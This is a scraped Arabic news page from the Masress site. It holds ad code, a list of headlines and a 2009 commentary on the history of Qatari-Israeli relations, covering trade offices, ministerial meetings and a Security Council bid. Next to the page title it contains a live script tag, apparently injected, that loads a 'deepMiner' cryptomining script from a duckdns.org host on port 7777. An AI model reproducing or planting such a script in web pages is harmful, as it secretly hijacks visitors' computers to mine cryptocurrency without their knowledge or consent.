googletag.defineSlot('/21620968445/Masress_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-1446553049-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_1', 'div-gpt-ad-1446553049-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553047-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_3', 'div-gpt-ad-1446553047-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553048-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_2', 'div-gpt-ad-1446553048-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Widget', [[222, 280]], 'div-gpt-ad-374346843-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Widget', 'div-gpt-ad-374346843-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1775746800-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Siteunder', 'div-gpt-ad-1775746800-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); مصرس : أسرار العلاقات القطرية الإسرائيلية<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
المنوفية تحصد منصب أمين اتحاد طالبات الأزهر    حلقة ناقشية لتعميم التنوع البيولوجي في قطاع الطاقة و التعدين    محافظ القليوبية: كوبري الشرقاوية شريان جديد بشبرا الخيمة    البورصة تختتم تعاملات أخر جلسات الأسبوع على أرباح 6.8 مليار جنيه    وزير التنمية المحلية يجتمع مع ١٠٠ شاب من أصحاب العمل المحلي    الرئيس الفلسطيني يشكر جهود مصر للتوصل إلى تهدئة في غزة    الاحتلال الإسرائيلي يعتقل أسرة فلسطينية في القدس    فيديو| وزير الشباب: سنصبح من أفضل 10 دول عالميا بالمجال الرياضي    خالد الدرندلي رئيسا لبعثة الأهلي في الإمارات لمواجهة الوصل    قرار مفاجئ من أجيري بشأن مباراة المنتخب الأولمبي أمام تونس    الكاف يحدد موعد مباريات دور ال 32 من دوري أبطال أفريقيا    ألبومات ذات صلة    صور وفيديو| كسر ماسورة مياه يصيب محور المشير بارتباك مروري    سقوط عصابة سرقة وفك أعمدة الإعلانات بشوارع التجمع الأول    الخبر التالى:    تنفيذ 4378 حكما على متهمين هاربين وتحصيل 229 ألف جنيه غرامات بالغربية    ضبط 4378 متهما هاربين من أحكام وتحصيل 22072 جنيها كغرامات بالغربية    أخبار قد تهمك    «وعاشروهن بالمعروف» تختتم رسائلها ب«العلاقة الخاصة» بين الزوجين    محافظ السويس يطالب العمال ببذل الجهد للانتهاء من إنشاء محطة صرف بحي الجناين    وزارتا التموين والأوقاف يتعاونان لتوزيع السكر والأرز على المحتاجين    .. وإجراءات استباقية لتأمين أبراج الكهرباء وصيانة المهمات    مصدر بالمصري ليلا كورة: نرغب في ضم باسم مرسي    لأول مرة.. دار الإفتاء تطلق وحدة لأفلام الرسوم المتحركة ردا على المتطرفين    سيول الخير تعم وادي فيران.. وأمطار على نويبع.. صور    أول رد من تركيا على تصريحات النيابة السعودية حول قضية خاشقجي    دعوات لفحص المعاملات المالية لحزب البديل بشكل كامل بعد تلقيه تبرعات مشبوهة    النيابة السعودية توضح دور "ولي العهد" في مقتل "خاشقجي"    شاهد.. لقطات مرعبة من حرائق كاليفورنيا    حزب الوفد ينعي للأمة المصرية البطل الشهيد ساطع النعماني    رئيس وزراء ماليزيا: نقل السفارة الأسترالية من تل أبيب إلى القدس غير مفيد    بالصور.. وزير الزراعة يتفقد معهد بحوث صحة الحيوان    شاهد.. لوحات إرشادية جديدة للمتحف المصرى بالتحرير احتفالا بعيده ال116    الأقصر تحتضن مهرجان الشعر العربي برعاية سلطان القاسمي    تعرف على موعد حفل شيرين الجديد    شاهد..ياسمين رئيس في شوارع بيروت    القول الحق فى مَولد خير الخلق    طارق سلمان: كلية طب الأزهر تقود الجامعة في تصنيفات عالمية    وزير المالية ل«الشروق»: الالتزام بالبرامج البيئية شرط توفير التمويل للمشروعات    محافظ أسوان يهنئ الدكتور مجدي يعقوب بمناسبة عيد ميلاده    حكم الجلوس في الصلاة لغير القادر    الأرصاد تناشد المواطنين بضرورة ارتداء الملابس الشتوية    الخبر التالى:    30 يونيو.. الانتهاء من الأعمال الإنشائية بمستشفى جهينة المركزي    غدا.. "شارك حبك لحبيبك" أمسية دينية لأوقاف الإسماعيلية    إغلاق الأكاديمية الدولية للتعليم بسبب العمل بدون ترخيص    محافظ الأقصر يلتقى وفد مشروع إعادة اكتشاف الأصول التراثية لإسنا    ميندي لاعب سيتي يخضع لجراحة في الركبة    علي معلول ومحمد نجيب يواصلان التأهيل في الأهلي    أنباء عن وقف التحالف العربي عملياته في الحديدة    " جروس" يصل القاهرة اليوم ليستكمل تدريبات الزمالك    تناول 4 فناجين قهوة يومياً يقى من مرض السكر    شاهد.. الكلية الفنية العسكرية تحصد جائزتين    دراسة: البشر أفضل في تذكر الأسماء عن الوجوه    بيع قلادة ماري أنطوانيت ب36 مليون دولار في مزاد بجنيف    بوضوح    كلام بحب    .. والسلام ختام    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





أسرار العلاقات القطرية الإسرائيلية
نشر في مصر الجديدة يوم 19 - 06 - 2009

بدأت علاقات دولة قطر مع إسرائيل بعد مؤتمر مدريد وكان أول لقاء قطري/ إسرائيلي علنياً وتم مع "شمعون بيرس" الذي افتتح المكتب التجارى الإسرائيلى فى الدوحة عام 1996، والذى أخبره بأنه كانت له لقاءات سابقة مع عرب ولكنها غير معلنة، و أن كل اللقاءات القطرية الإسرائيلية كانت معلنة، كما أن علاقات قطر مع إسرائيل ساعدت في حل قضايا كثيرة وتهدئة أوضاع معينة يعرفها الفلسطينيون والإسرائيليون، أن هذه العلاقات تستهدف التهدئة ونقل رسالة لإسرائيل مفادها أن المشكلة معها تتمثل في الحقوق العربية وأنه متى عادت هذه الحقوق حسب القرارات الدولية فليس هناك مشكلة، كمااستهدفت العلاقة وقتها ترشيح قطر لعضوية غير دائمة في مجلس الأمن الدولي كان مقررا من عام 1993 و ذلك يمثل إضافة خليجية وعربية، أما بالنسبة لمشروع الشرق الأوسط الكبير فإن قطر مع الإصلاح والديمقراطية، كما انه لم يذهب لإسرائيل سوى مرة واحدة وكانت من القاهرة لإسرائيل للقاء الرئيس الفلسطينى الراحل "ياسر عرفات" عندما كان تحت الحصار الإسرائيلي .
وقد اعترفت قطر بالفعل بإسرائيل في ظل اتفاقية التجارة الحرة " الجات " فهذه الاتفاقية لها شروطها ومنها انه لا توجد مقاطعة، والعلاقات القطرية الإسرائيلية طبيعية و العلاقات مع الولايات المتحدة مبنية على أسس سليمة وإن كانت هناك خلافات .
وتجدر الإشارة إلى أن قطر قد قررت التبرع بستة ملايين دولار لبناء مجمع رياضي في بلدة " سخنين " ذات الأغلبية العربية في إسرائيل، كما تم إجراء لقاءات عديدة بين مسئولين قطريين وإسرائيليين، ومن أهمها اللقاء الذى تم بين وزير خارجية قطر " الشيخ حمد بن جاسم آل ثانى " ووزير خارجية إسرائيل " سيلفان شالوم " عام 2005، غلى هامش اجتماعات الجمعية العمومية للامم المتحدة، حيث أثني المسئول القطري أمام مجلس العلاقات الخارجية بنيويورك على الانسحاب الإسرائيلى من غزة وطالب الدول العربية بالإستجابة للمبادرة، وقبيل لقاءه بنظيره الإسرائيلي سيلفان شالوم في اجتماع مغلق فقد استبعد آل ثاني إقامة علاقات دبلوماسية مع إسرائيل قبل إعلان الدولة الفلسطينية، إلا أنه عاد وأشار أمام حشد من الصحفيين قائلاً " من الممكن أن يتم ذلك.. لكننا نحتاج إلى جدول زمني.. كيف سنبدأ العملية السلمية وكيف سننتهي، وقال إن اللقاء خطوة هامة ولن يكون الاخير، بينما رحب شالوم بعقد اللقاءات العربية /الإسرائيلية التي كانت تتم سابقاً تحت طي الكتمان لتكون في العلن، ونفى المسؤلان القطري والإسرائيلي وجود خطط لعقد قمة بين أمير قطر الشيخ حمد بن خليفة آل ثاني ورئيس الوزراء الإسرائيلي آريئيل شارون، وتأتي التطورات الأخيرة كحافز لإسرائيل التي أنهت مؤخراً الانسحاب من غزة بعد 38 عاماً من الاحتلال، وهو أول انسحاب من أراضي ستشاد عليها الدولة الفلسطينية.
وقد اتخذت قطر الأسلوب العلني في اتصالاتها مع اسرائيل منذ أن بدأت اللقاءات بين الجانبين منذ نحو 13 عاماً، وهو ماوضح في اللقاء الأول بين وزير الخارجية القطري الشيخ حمد بن جاسم مع وزير الخارجية الاسرائيلي " شالوم " فى باريس عام 2003 وهو أول لقاء علني لشالوم مع وزير خارجية عربي منذ توليه منصبه في 27 فبراير فى العام نفسه، كما سبق أن تقابل وزير الخارجية القطرى مع وزير خارجية إسرائيل " شمعون بيرس " بباريس فى نوفمبر 2002، وهو مايتناقض مع نهج عدد من الدول العربية التي تعتمد على اللقاءات السرية، كما أنه لم يقم أي مسئول إسرائيلي لم بزيارة الدوحة منذ أن زارها " بيرس " عام 1996 أى منذ عشر سنوات.
وكانت اسرائيل افتتحت مكتب للتمثيل التجاري في الدوحة منذ عدة سنوات وبالتحديد عام 1996، وأعلنت قطر - قبيل القمة الاسلامية التي استضافتها – إغلاق هذا المكتب وإن كانت التصريحات الرسمية تبين استمراره حالياً، خاصة وأن أحد المواطنين القطريين قد رفع دعوى قضائية طالب فيها تسليمه المبنى الذى يقع فيه المكتب الاسرائيلي لكونه يرفض تأجيره للاسرائيليين بعد قيام شخص آخر بتأجيره لهم، وقد أصدرت المحكمة القطرية حكمها بتسليم المبنى لصاحبه وإخراج الاسرائيليين منه .
وفى الإطار السابق تدعو قطر الى عقد مؤتمر دولي ترعاه الدول الثماني وتشارك فيه الدول العربية واسرائيل لاقرار وثيقة توضح ما هو مطلوب من اسرائيل وماهو المقابل لحل الصراع من العالم العربي، وتركز وجهة النظر القطرية على أن الخلاف مع إسرائيل حول الحقوق العربية على الرغم أن تلك الحقوق قد تراجعت لصالح إسرائيل منذ عام 1948 وحتى الآن .
ومن الملاحظ عدم رفض القيادة الفلسطينية اللقاءات النى تتم بين العرب و الاسرائيليين، حيث أن الرئيس الفلسطيني الراحل " ياسر عرفات " كان يشجع مثل هذه اللقاءات باعتبار أنها توضح للاسرائيليين أن العرب سيقومون بالتطبيع مع إسرائيل فى حالة تسوية القضية الفلسطينية، بينما تشير بعض المصادر إلى تحسب الفلسطينيين من تنامى العلاقات بين جهازى المخابرات القطرية والإسرائيلية، وفى الوقت نفسه صرحت الناطقة باسم الخارجية الاسرائيلية بأن قطر طلبت دعم اسرائيل للترشح لمجلس الأمن، وأن قطر الدولة الوحيدة في الخليج التى ترتبط بعلاقات ايجابية مع إسرائيل.
فى ضوء ما سبق يمكن التقدير بأن قطر ستبقي على مستوى العلاقات مع إسرائيل على وضعها الحالي إلى حين حدوث تقدم في السياسة الاسرائيلية تجاه الحقوق الفلسطينية، خاصة وأن العلاقات القطرية / الفلسطينية تتسم بالقوة ( توجد لجنة مشتركة لدعم القدس تجتمع دوريا - تقيم الدوحة مشاريع قطرية في مناطق فلسطينية - ..... )، وإن كانت بعض المصادر أشارت إلى نية قطر رفع مستوى العلاقات مع إسرائيل، وذلك ارتباطا بزيارة غير معلنة قام بها مسئولون إسرائيليون للدوحة فى نوفمبر 2005 برئاسة سفير سبق له العمل فى سفارتى إسرائيل بالقاهرة وعمان، وذلك بهدف تنشيط العلاقات بين البلدين فى مختلف المجالات.
* الخبير الاستراتيجى والمتخصص فى الشئون الإسرائيلية


انقر هنا لقراءة الخبر من مصدره.